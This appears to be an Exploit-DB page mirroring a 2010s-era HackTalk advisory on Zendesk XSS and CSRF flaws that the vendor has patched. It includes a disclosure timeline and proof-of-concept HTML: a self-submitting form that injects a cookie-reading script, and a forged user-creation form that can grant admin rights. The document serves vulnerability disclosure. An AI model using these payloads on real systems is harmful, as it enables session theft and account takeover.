header-logo
Suggest Exploit
vendor:
Zendesk
by:
Luis Santana
8,8
CVSS
HIGH
Multiple
79, 352
CWE
Product Name: Zendesk
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Zendesk Multiple Vulnerabilities

Luis Santana of the HackTalk Security team has found multiple vulnerabilities in Zendesk. These include XSS due to lack of input sanitation in the email address field of the anonymous_requests page, and CSRF due to lack of input sanitation in many forms, the most notable example being the new user creation form which allows an attacker to create a new administrative user.

Mitigation:

Input sanitation should be implemented for all forms and fields to prevent XSS and CSRF attacks.
Source

Exploit-DB raw data:

/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\

:Zendesk Multiple Vulnerabilities : 

\________________________________/

/Discovered By:                  \

|Luis Santana                     |

\________________________________/


Overview

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

Luis Santana of the HackTalk Security team has found multiple vulnerabilities in Zendesk.

Product Information

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

Product/Script: Zendesk

Affected Version:

Vulnerability Type: Multiple

Security Risk: Multiple

Vendor URL: http://zendesk.com

Product/Script Demo:

Vendor Status: Notified

Patch/Fix Status: Patches Made

Advisory Timeline:  July 31st 9:34am EST - Zendesk Contacted about XSS

                    July 31st 12:42pm EST - Ticket passed to Security Department

                    July 31st 10:46pm EST - Zendesk has started producing patch. Given the go ahead to publicly disclose

                    July 31st 1:00am EST - Found CSRF, continuing investigation

                    August 1st 3:49pm EST - CSRF Patch in production

                    August 4th 3:51am EST - CSRF patch being rolled out

                    August 10th 3:36pm EST - Given the ok to post advisory publicly

Advisory URL: http://hacktalk.net/exploit/exploit.php?n=10

Product Description

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

Web-based customer support software with elegant ticket mnagement and a self-service customer community platform. Agile, smart and convenient.

(From http://www.zendesk.com)

Vulnerability Details

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

XSS -
The email address field of the anonymous_requests page is vulnerable to XSS due to lack of input sanitation. By crafting a malcious POST request an attacker is able to inject HTML, Javascript or AJAX into the anonymous_requests page.

CSRF -
Due to a lack of input sanitation many forms are vulnerable to CSRF. The most notable example is the new user creation form which allows an attacker to create a new administrative user.

Proof of Concept

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

XSS -

<html>

<head></head>

<body>

<form method="POST" action="https://site.com/anonymous_requests"name="explForm">

<input type=hidden name=email value='"><script>alert("I could have just stolen your cookie" + document.cookie);</script>'

</form>

<script language="Javascript">

setTimeout('explForm.submit()', 1000 * 1);

</script>

</body>


CSRF -

<form action="http://site.com/users" class="new_user" enctype="multipart/form-data" id="user-form" method="post" name="userform" onsubmit="return submitUser()">

  <input id="ignore-upload-user" name="ignoreupload" type="hidden" value="0" />

  <h2>Name <span class="sub">Display name used throughout the help desk.</span></h2>

  <input id="user_name" name="user[name]" size="30" type="text" />

  <!--<p>Display name used throughout the help desk.</p>-->

          <h3>

        Email

        <span class="sub">Used when logging in.</span>

      </h3>

      <input id="user_email" name="user[email]" size="30" type="text" />

      <h3>

        Twitter account

      </h3>

      <input id="user_new_twitter_identity" name="user[new_twitter_identity]" size="30" type="text" />

  <h3>Phone number <span class="sub">Optional.</span></h3>

  <input id="user_phone" name="user[phone]" size="30" type="text" />

  <h3>Time zone</h3>

     <select id="user_time_zone" name="user[time_zone]"><option value="International Date Line West">(GMT-11:00) International Date Line West</option>

<option value="Midway Island">(GMT-11:00) Midway Island</option>

<option value="Samoa">(GMT-11:00) Samoa</option>

<option value="Hawaii">(GMT-10:00) Hawaii</option>

<option value="Alaska">(GMT-09:00) Alaska</option>

<option value="Pacific Time (US & Canada)">(GMT-08:00) Pacific Time (US & Canada)</option>

<option value="Tijuana">(GMT-08:00) Tijuana</option>

<option value="Arizona">(GMT-07:00) Arizona</option>

<option value="Chihuahua">(GMT-07:00) Chihuahua</option>

<option value="Mazatlan">(GMT-07:00) Mazatlan</option>

<option value="Mountain Time (US & Canada)">(GMT-07:00) Mountain Time (US & Canada)</option>

<option value="Central America">(GMT-06:00) Central America</option>

<option value="Central Time (US & Canada)">(GMT-06:00) Central Time (US & Canada)</option>

<option value="Guadalajara">(GMT-06:00) Guadalajara</option>

<option value="Mexico City">(GMT-06:00) Mexico City</option>

<option value="Monterrey">(GMT-06:00) Monterrey</option>

<option value="Saskatchewan">(GMT-06:00) Saskatchewan</option>

<option value="Bogota" selected="selected">(GMT-05:00) Bogota</option>

<option value="Eastern Time (US & Canada)">(GMT-05:00) Eastern Time (US & Canada)</option>

<option value="Indiana (East)">(GMT-05:00) Indiana (East)</option>

<option value="Lima">(GMT-05:00) Lima</option>

<option value="Quito">(GMT-05:00) Quito</option>

<option value="Caracas">(GMT-04:30) Caracas</option>

<option value="Atlantic Time (Canada)">(GMT-04:00) Atlantic Time (Canada)</option>

<option value="La Paz">(GMT-04:00) La Paz</option>

<option value="Santiago">(GMT-04:00) Santiago</option>

<option value="Newfoundland">(GMT-03:30) Newfoundland</option>

<option value="Brasilia">(GMT-03:00) Brasilia</option>

<option value="Buenos Aires">(GMT-03:00) Buenos Aires</option>

<option value="Georgetown">(GMT-03:00) Georgetown</option>

<option value="Greenland">(GMT-03:00) Greenland</option>

<option value="Mid-Atlantic">(GMT-02:00) Mid-Atlantic</option>

<option value="Azores">(GMT-01:00) Azores</option>

<option value="Cape Verde Is.">(GMT-01:00) Cape Verde Is.</option>

<option value="Casablanca">(GMT+00:00) Casablanca</option>

<option value="Dublin">(GMT+00:00) Dublin</option>

<option value="Edinburgh">(GMT+00:00) Edinburgh</option>

<option value="Lisbon">(GMT+00:00) Lisbon</option>

<option value="London">(GMT+00:00) London</option>

<option value="Monrovia">(GMT+00:00) Monrovia</option>

<option value="UTC">(GMT+00:00) UTC</option>

<option value="Amsterdam">(GMT+01:00) Amsterdam</option>

<option value="Belgrade">(GMT+01:00) Belgrade</option>

<option value="Berlin">(GMT+01:00) Berlin</option>

<option value="Bern">(GMT+01:00) Bern</option>

<option value="Bratislava">(GMT+01:00) Bratislava</option>

<option value="Brussels">(GMT+01:00) Brussels</option>

<option value="Budapest">(GMT+01:00) Budapest</option>

<option value="Copenhagen">(GMT+01:00) Copenhagen</option>

<option value="Ljubljana">(GMT+01:00) Ljubljana</option>

<option value="Madrid">(GMT+01:00) Madrid</option>

<option value="Paris">(GMT+01:00) Paris</option>

<option value="Prague">(GMT+01:00) Prague</option>

<option value="Rome">(GMT+01:00) Rome</option>

<option value="Sarajevo">(GMT+01:00) Sarajevo</option>

<option value="Skopje">(GMT+01:00) Skopje</option>

<option value="Stockholm">(GMT+01:00) Stockholm</option>

<option value="Vienna">(GMT+01:00) Vienna</option>

<option value="Warsaw">(GMT+01:00) Warsaw</option>

<option value="West Central Africa">(GMT+01:00) West Central Africa</option>

<option value="Zagreb">(GMT+01:00) Zagreb</option>

<option value="Athens">(GMT+02:00) Athens</option>

<option value="Bucharest">(GMT+02:00) Bucharest</option>

<option value="Cairo">(GMT+02:00) Cairo</option>

<option value="Harare">(GMT+02:00) Harare</option>

<option value="Helsinki">(GMT+02:00) Helsinki</option>

<option value="Istanbul">(GMT+02:00) Istanbul</option>

<option value="Jerusalem">(GMT+02:00) Jerusalem</option>

<option value="Kyev">(GMT+02:00) Kyev</option>

<option value="Minsk">(GMT+02:00) Minsk</option>

<option value="Pretoria">(GMT+02:00) Pretoria</option>

<option value="Riga">(GMT+02:00) Riga</option>

<option value="Sofia">(GMT+02:00) Sofia</option>

<option value="Tallinn">(GMT+02:00) Tallinn</option>

<option value="Vilnius">(GMT+02:00) Vilnius</option>

<option value="Baghdad">(GMT+03:00) Baghdad</option>

<option value="Kuwait">(GMT+03:00) Kuwait</option>

<option value="Moscow">(GMT+03:00) Moscow</option>

<option value="Nairobi">(GMT+03:00) Nairobi</option>

<option value="Riyadh">(GMT+03:00) Riyadh</option>

<option value="St. Petersburg">(GMT+03:00) St. Petersburg</option>

<option value="Volgograd">(GMT+03:00) Volgograd</option>

<option value="Tehran">(GMT+03:30) Tehran</option>

<option value="Abu Dhabi">(GMT+04:00) Abu Dhabi</option>

<option value="Baku">(GMT+04:00) Baku</option>

<option value="Muscat">(GMT+04:00) Muscat</option>

<option value="Tbilisi">(GMT+04:00) Tbilisi</option>

<option value="Yerevan">(GMT+04:00) Yerevan</option>

<option value="Kabul">(GMT+04:30) Kabul</option>

<option value="Ekaterinburg">(GMT+05:00) Ekaterinburg</option>

<option value="Islamabad">(GMT+05:00) Islamabad</option>

<option value="Karachi">(GMT+05:00) Karachi</option>

<option value="Tashkent">(GMT+05:00) Tashkent</option>

<option value="Chennai">(GMT+05:30) Chennai</option>

<option value="Kolkata">(GMT+05:30) Kolkata</option>

<option value="Mumbai">(GMT+05:30) Mumbai</option>

<option value="New Delhi">(GMT+05:30) New Delhi</option>

<option value="Sri Jayawardenepura">(GMT+05:30) Sri Jayawardenepura</option>

<option value="Kathmandu">(GMT+05:45) Kathmandu</option>

<option value="Almaty">(GMT+06:00) Almaty</option>

<option value="Astana">(GMT+06:00) Astana</option>

<option value="Dhaka">(GMT+06:00) Dhaka</option>

<option value="Novosibirsk">(GMT+06:00) Novosibirsk</option>

<option value="Rangoon">(GMT+06:30) Rangoon</option>

<option value="Bangkok">(GMT+07:00) Bangkok</option>

<option value="Hanoi">(GMT+07:00) Hanoi</option>

<option value="Jakarta">(GMT+07:00) Jakarta</option>

<option value="Krasnoyarsk">(GMT+07:00) Krasnoyarsk</option>

<option value="Beijing">(GMT+08:00) Beijing</option>

<option value="Chongqing">(GMT+08:00) Chongqing</option>

<option value="Hong Kong">(GMT+08:00) Hong Kong</option>

<option value="Irkutsk">(GMT+08:00) Irkutsk</option>

<option value="Kuala Lumpur">(GMT+08:00) Kuala Lumpur</option>

<option value="Perth">(GMT+08:00) Perth</option>

<option value="Singapore">(GMT+08:00) Singapore</option>

<option value="Taipei">(GMT+08:00) Taipei</option>

<option value="Ulaan Bataar">(GMT+08:00) Ulaan Bataar</option>

<option value="Urumqi">(GMT+08:00) Urumqi</option>

<option value="Osaka">(GMT+09:00) Osaka</option>

<option value="Sapporo">(GMT+09:00) Sapporo</option>

<option value="Seoul">(GMT+09:00) Seoul</option>

<option value="Tokyo">(GMT+09:00) Tokyo</option>

<option value="Yakutsk">(GMT+09:00) Yakutsk</option>

<option value="Adelaide">(GMT+09:30) Adelaide</option>

<option value="Darwin">(GMT+09:30) Darwin</option>

<option value="Brisbane">(GMT+10:00) Brisbane</option>

<option value="Canberra">(GMT+10:00) Canberra</option>

<option value="Guam">(GMT+10:00) Guam</option>

<option value="Hobart">(GMT+10:00) Hobart</option>

<option value="Melbourne">(GMT+10:00) Melbourne</option>

<option value="Port Moresby">(GMT+10:00) Port Moresby</option>

<option value="Sydney">(GMT+10:00) Sydney</option>

<option value="Vladivostok">(GMT+10:00) Vladivostok</option>

<option value="Magadan">(GMT+11:00) Magadan</option>

<option value="New Caledonia">(GMT+11:00) New Caledonia</option>

<option value="Solomon Is.">(GMT+11:00) Solomon Is.</option>

<option value="Auckland">(GMT+12:00) Auckland</option>

<option value="Fiji">(GMT+12:00) Fiji</option>

<option value="Kamchatka">(GMT+12:00) Kamchatka</option>

<option value="Marshall Is.">(GMT+12:00) Marshall Is.</option>

<option value="Wellington">(GMT+12:00) Wellington</option>

<option value="Nuku'alofa">(GMT+13:00) Nuku'alofa</option><option value="" disabled="disabled">-------------</option>

</select>

  <a name="photo">

      <h3>Photo <span class="sub">An optional smiling face. For the best results, upload a photo with equal length and height.</span></h3>

      <input id="photo_uploaded_data" name="photo[uploaded_data]" type="file" />

  </a>

    <h3>Detailed information</h3>

    <textarea cols="60" id="user_details" name="user[details]" rows="5">&lt;/textarea&gt;

    <p>Optional detailed information concerning this user, e.g. an address. This information is visible to agents only, never to end-users.</p>

    <h3>Notes</h3>

    <textarea cols="60" id="user_notes" name="user[notes]" rows="5">&lt;/textarea&gt;

    <p>Optional notes concerning this user. Notes can also be added/edited for a requester directly on the ticket form page.<br/>Notes are visible to agents only, never to any end-user.</p>

      <div id="organization-block">

          <h3>Organization</h3>

 <select id="user_organization_id" name="user[organization_id]" style="width:auto;"><option value="">(None)</option>

<option value="237057">HackTalk Security</option></select>

          <p>Leave blank to select default organization according to organization mappings.</p>

      </div>

      <h3>Role - privileges granted to this user</h3>

      <h4>

        <input checked="checked" id="user-radio" name="user[roles]" onclick="checkAgent();" type="radio" value="0" />

        End-user.

        <span class="sub">Submits support tickets to the help desk.</span>

      </h4>

      <div id="end_user_block" class="indented_option" style="">

        <h4>Has access to:</h4>

        <p><input checked="checked" id="user_restriction_id_4" name="user[restriction_id]" type="radio" value="4" /> Tickets requested by user only</p>

          <p><input id="user_restriction_id_2" name="user[restriction_id]" type="radio" value="2" /> Tickets from user's organization</p>

          <p>Note - if the user belongs to a shared organization, then the user always has access to tickets in the organization.</p>

      </div>

        <h4>

          <input id="user_roles_4" name="user[roles]" onclick="checkAgent();" type="radio" value="4" />

          Agent.

          <span class="sub">Help desk operator. Receives and resolves tickets from end-users.</span>

        </h4>

        <div id="agent_block" class="indented_option" style="display:none;">

          <div id="agent_groups"></div>

          <h4>Has access to:</h4>

          <p><input id="user_restriction_id_0" name="user[restriction_id]" type="radio" value="0" /> All tickets <span class="sub">(can also add, modify and assume end-users)</span></p>

            <p>

                <input type="radio" value="2" name="user[restriction_id]" id="snov"/>

              Tickets requested by users in this agent's organization <span class="sub">(also can't see forums restricted to other organizations)</span>

            </p>

          <p><input id="user_restriction_id_3" name="user[restriction_id]" type="radio" value="3" /> Tickets assigned to this agent only</p>

          <h4>Can add ticket comments that are:</h4>

          <p>

          <label class="option"><input checked="checked" class="radio" id="user_is_private_comments_only_false" name="user[is_private_comments_only]" type="radio" value="false" /> Public or private</label>

          <label class="option"><input class="radio" id="user_is_private_comments_only_true" name="user[is_private_comments_only]" type="radio" value="true" /> Private only (viewable only by other agents)</label>

          </p>

          <h4>Can moderate (edit, delete and reorder) topics in forums:</h4>

          <p>

            <label class="option"><input class="radio" id="user_is_moderator_true" name="user[is_moderator]" type="radio" value="true" /> Yes</label>

            <label class="option"><input checked="checked" class="radio" id="user_is_moderator_false" name="user[is_moderator]" type="radio" value="false" /> No</label>

          </p>

        </div>

        <h4>

          <input id="user_roles_2" name="user[roles]" onclick="checkAgent();" type="radio" value="2" />

          Admin.

          <span class="sub">Manages the help desk with regard to rules, users, organizations, groups and SLA's. Has access to all tickets.</span>

          <div id="admin_groups" class="indented_option"></div>

        </h4>

  <div class="action">

    <input class="buttonsubmit" id="submit-button" name="commit" type="submit" value="Create" />

  </div>


Patch/Fix Suggestion(s)

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

Upgrade to the latest version of Zendesk as they have released patches for these vulnerabilities.

Security Risk

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

XSS - Low

CSRF - Mid

Author:

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

The Author and Researcher of this Advisory is Luis Santana of the HackTalk Security Team

Navigation

Suggest Exploit

Services By CQR